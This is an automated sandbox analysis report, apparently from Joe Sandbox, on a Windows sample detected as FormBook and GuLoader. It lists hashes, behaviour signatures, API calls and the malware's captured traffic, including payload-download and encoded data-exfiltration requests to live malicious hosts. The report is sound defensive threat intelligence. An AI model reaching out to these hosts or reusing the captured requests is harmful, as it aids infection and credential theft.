Windows Analysis Report
16042024124521.exe

Overview

General Information

Sample name: 16042024124521.exe
Analysis ID: 1426621
MD5: 56575888228a0c147ffc3ebd257dd628
SHA1: 8a97ce01e100c9e24a6b1ec2d83db98dca825d3e
SHA256: b0243eff8a4ce7a2d60b4a2af08adc2de364f1bce4e16ce1fb737d912d4088d3

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://103.14.155.180/bwphkvcX154.bin Virustotal: Detection: 6%
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Virustotal: Detection: 20%
Source: 16042024124521.exe Virustotal: Detection: 20%
Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: 16042024124521.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 16042024124521.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2393562769.0000000007605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2877935687.0000000000FFE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Core.pdbDZ source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Kanels.exe, Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000001.00000002.2393562769.0000000007613000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1B880 FindFirstFileW,FindNextFileW,FindClose, 12_2_02D1B880
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then xor eax, eax 12_2_02D09430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 12_2_02D11DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 12_2_02D11DAF
Source: Joe Sandbox View IP Address: 103.14.155.180
Source: Joe Sandbox View IP Address: 217.160.0.183
Source: Joe Sandbox View IP Address: 112.175.50.218
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: global traffic HTTP traffic detected:
    GET /bwphkvcX154.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: 103.14.155.180
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /9pdo/?Nj=1XS0Y&1fd8thFH=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    Host: www.ejbodyart.com
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: unknown DNS traffic detected: queries for: www.ejbodyart.com
Source: unknown HTTP traffic detected:
    POST /9pdo/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-us
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 205
    Connection: close
    Cache-Control: no-cache
    Host: www.jt-berger.store
    Origin: http://www.jt-berger.store
    Referer: http://www.jt-berger.store/9pdo/
    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
    Data Ascii: 1fd8thFH=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 16 Apr 2024 10:25:50 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Date: Tue, 16 Apr 2024 10:26:06 GMT
    Server: Apache
    Content-Encoding: gzip
    Data: gzip-compressed chunked body (chunk size 0x173, binary)
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Date: Tue, 16 Apr 2024 10:26:09 GMT
    Server: Apache
    Content-Encoding: gzip
    Data: gzip-compressed chunked body (chunk size 0x173, binary)
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Date: Tue, 16 Apr 2024 10:26:12 GMT
    Server: Apache
    Content-Encoding: gzip
    Data: gzip-compressed chunked body (chunk size 0x173, binary)
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.bin
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.binG
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.binY
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.binx
Source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.2393562769.00000000075FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 16042024124521.exe, 00000000.00000002.1657897984.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 16042024124521.exe, 00000000.00000000.1635365176.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Kanels.exe, 00000007.00000000.2228874024.000000000040A000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2388863811.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2388863811.00000000049A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2388863811.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Kanels.exe, 00000007.00000001.2229815753.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Kanels.exe, 00000007.00000001.2229815753.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000001.00000002.2388863811.00000000049A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2388863811.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: cmd.exe, 0000000C.00000003.2715835677.0000000008036000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405425

E-Banking Fraud

Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Kanels.exe
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12B60 NtClose,LdrInitializeThunk, 7_2_22D12B60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_22D12C70
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_22D12DF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D135C0 NtCreateMutant,LdrInitializeThunk, 7_2_22D135C0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D14340 NtSetContextThread, 7_2_22D14340
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D14650 NtSuspendThread, 7_2_22D14650
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12AD0 NtReadFile, 7_2_22D12AD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12AF0 NtWriteFile, 7_2_22D12AF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12AB0 NtWaitForSingleObject, 7_2_22D12AB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12BF0 NtAllocateVirtualMemory, 7_2_22D12BF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12BE0 NtQueryValueKey, 7_2_22D12BE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12B80 NtQueryInformationFile, 7_2_22D12B80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12BA0 NtEnumerateValueKey, 7_2_22D12BA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12EE0 NtQueueApcThread, 7_2_22D12EE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12E80 NtReadVirtualMemory, 7_2_22D12E80
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12EA0 NtAdjustPrivilegesToken, 7_2_22D12EA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12E30 NtWriteVirtualMemory, 7_2_22D12E30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12FE0 NtCreateFile, 7_2_22D12FE0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12F90 NtProtectVirtualMemory, 7_2_22D12F90
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12FB0 NtResumeThread, 7_2_22D12FB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12FA0 NtQuerySection, 7_2_22D12FA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12F60 NtCreateProcessEx, 7_2_22D12F60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12F30 NtCreateSection, 7_2_22D12F30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12CC0 NtQueryVirtualMemory, 7_2_22D12CC0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12CF0 NtOpenProcess, 7_2_22D12CF0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12CA0 NtQueryInformationToken, 7_2_22D12CA0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12C60 NtCreateKey, 7_2_22D12C60
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12C00 NtQueryInformationProcess, 7_2_22D12C00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12DD0 NtDelayExecution, 7_2_22D12DD0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12DB0 NtEnumerateKey, 7_2_22D12DB0
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12D10 NtMapViewOfSection, 7_2_22D12D10
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12D00 NtSetInformationFile, 7_2_22D12D00
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D12D30 NtUnmapViewOfSection, 7_2_22D12D30
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D13090 NtSetValueKey, 7_2_22D13090
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D13010 NtOpenDirectoryObject, 7_2_22D13010
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Code function: 7_2_22D139B0 NtGetContextThread, 7_2_22D139B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03784340 NtSetContextThread,LdrInitializeThunk, 12_2_03784340
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03784650 NtSuspendThread,LdrInitializeThunk, 12_2_03784650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782B60 NtClose,LdrInitializeThunk, 12_2_03782B60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782AF0 NtWriteFile,LdrInitializeThunk, 12_2_03782AF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782AD0 NtReadFile,LdrInitializeThunk, 12_2_03782AD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782F30 NtCreateSection,LdrInitializeThunk, 12_2_03782F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782FE0 NtCreateFile,LdrInitializeThunk, 12_2_03782FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782FB0 NtResumeThread,LdrInitializeThunk, 12_2_03782FB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782EE0 NtQueueApcThread,LdrInitializeThunk, 12_2_03782EE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782D30 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_03782D30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782D10 NtMapViewOfSection,LdrInitializeThunk, 12_2_03782D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_03782DF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782DD0 NtDelayExecution,LdrInitializeThunk, 12_2_03782DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_03782C70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782C60 NtCreateKey,LdrInitializeThunk, 12_2_03782C60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782CA0 NtQueryInformationToken,LdrInitializeThunk, 12_2_03782CA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037835C0 NtCreateMutant,LdrInitializeThunk, 12_2_037835C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_037839B0 NtGetContextThread,LdrInitializeThunk, 12_2_037839B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782BF0 NtAllocateVirtualMemory, 12_2_03782BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782BE0 NtQueryValueKey, 12_2_03782BE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782BA0 NtEnumerateValueKey, 12_2_03782BA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782B80 NtQueryInformationFile, 12_2_03782B80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782AB0 NtWaitForSingleObject, 12_2_03782AB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782F60 NtCreateProcessEx, 12_2_03782F60
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782FA0 NtQuerySection, 12_2_03782FA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782F90 NtProtectVirtualMemory, 12_2_03782F90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782E30 NtWriteVirtualMemory, 12_2_03782E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782EA0 NtAdjustPrivilegesToken, 12_2_03782EA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782E80 NtReadVirtualMemory, 12_2_03782E80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782D00 NtSetInformationFile, 12_2_03782D00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782DB0 NtEnumerateKey, 12_2_03782DB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782C00 NtQueryInformationProcess, 12_2_03782C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782CF0 NtOpenProcess, 12_2_03782CF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03782CC0 NtQueryVirtualMemory, 12_2_03782CC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783010 NtOpenDirectoryObject, 12_2_03783010
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783090 NtSetValueKey, 12_2_03783090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783D70 NtOpenThread, 12_2_03783D70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03783D10 NtOpenProcessToken, 12_2_03783D10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27730 NtCreateFile, 12_2_02D27730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27A10 NtClose, 12_2_02D27A10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27890 NtReadFile, 12_2_02D27890
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D27970 NtDeleteFile, 12_2_02D27970
